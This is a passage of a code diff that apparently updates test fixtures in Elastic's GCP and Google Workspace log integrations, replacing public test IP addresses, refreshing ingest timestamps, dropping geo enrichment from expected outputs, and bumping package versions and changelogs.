"{\"insertId\":\"14iipwlfd8t01g\",\"jsonPayload\":{\"bytes_sent\":\"5044\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"87\",\"reporter\":\"DEST\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466868771Z", "end": "2019-06-14T03:49:37.933154111Z", @@ -25890,18 +25890,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33574, "bytes": 14132, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 91 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:nv2CjECKqbosaYrr1Kt1ArPTXsg=", + "community_id": "1:GUQu5kCJyjYidboU6syeeSdt5Js=", "bytes": 14132, "name": "default", "transport": "tcp", @@ -25923,7 +25923,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -25960,8 +25960,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869346300Z", - "original": "{\"insertId\":\"14iipwlfd8t01l\",\"jsonPayload\":{\"bytes_sent\":\"14132\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"91\",\"reporter\":\"DEST\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392633300Z", + "original": "{\"insertId\":\"14iipwlfd8t01l\",\"jsonPayload\":{\"bytes_sent\":\"14132\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"91\",\"reporter\":\"DEST\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.468484109Z", "end": "2019-06-14T03:49:51.821056075Z", @@ -25982,10 +25982,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33574, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -25999,7 +25999,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:nv2CjECKqbosaYrr1Kt1ArPTXsg=", + "community_id": "1:GUQu5kCJyjYidboU6syeeSdt5Js=", "bytes": 151213, "name": "default", "transport": "tcp", @@ -26022,7 +26022,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -26058,8 +26058,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869348800Z", - "original": "{\"insertId\":\"14iipwlfd8t01b\",\"jsonPayload\":{\"bytes_sent\":\"151213\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"68\",\"reporter\":\"SRC\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392638900Z", + "original": "{\"insertId\":\"14iipwlfd8t01b\",\"jsonPayload\":{\"bytes_sent\":\"151213\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"68\",\"reporter\":\"SRC\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.468484109Z", "end": "2019-06-14T03:49:51.821129119Z", diff --git a/packages/gcp/manifest.yml b/packages/gcp/manifest.yml index 0c0e33f50d8..c4ea88ff676 100644 --- a/packages/gcp/manifest.yml +++ b/packages/gcp/manifest.yml @@ -1,6 +1,6 @@ name: gcp title: Google Cloud Platform -version: 1.2.0 +version: 1.2.1 release: ga description: Collect logs from Google Cloud Platform with Elastic Agent. type: integration diff --git a/packages/google_workspace/changelog.yml b/packages/google_workspace/changelog.yml index 8ce66900b6b..5e6d2d6ad32 100644 --- a/packages/google_workspace/changelog.yml +++ b/packages/google_workspace/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log index 2d2d36e96a3..fa9088086f8 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log @@ -1,9 +1,9 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CHANGE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"REORDER_GROUP_BASED_POLICIES_EVENT","parameters":[{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_PRIORITIES","multiValue":["a","b"]},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"GPLUS_PREMIUM_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"UPDATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED","parameters":[{"name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION","value":"FLASHLIGHT_EDU_SELECTION_MANUAL"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CHANGE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"REORDER_GROUP_BASED_POLICIES_EVENT","parameters":[{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_PRIORITIES","multiValue":["a","b"]},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"GPLUS_PREMIUM_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"UPDATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED","parameters":[{"name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION","value":"FLASHLIGHT_EDU_SELECTION_MANUAL"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json index c8ba6f01cfb..13667692276 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876830900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:24.232161700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_APPLICATION_SETTING", "id": "1", @@ -93,7 +75,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -117,35 +99,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876859700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:24.232166900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CREATE_APPLICATION_SETTING", "id": "1", @@ -176,7 +140,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -200,35 +164,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876868Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:24.232172300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "DELETE_APPLICATION_SETTING", "id": "1", @@ -259,7 +205,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -283,35 +229,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876898800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:24.232179800Z", + "original": 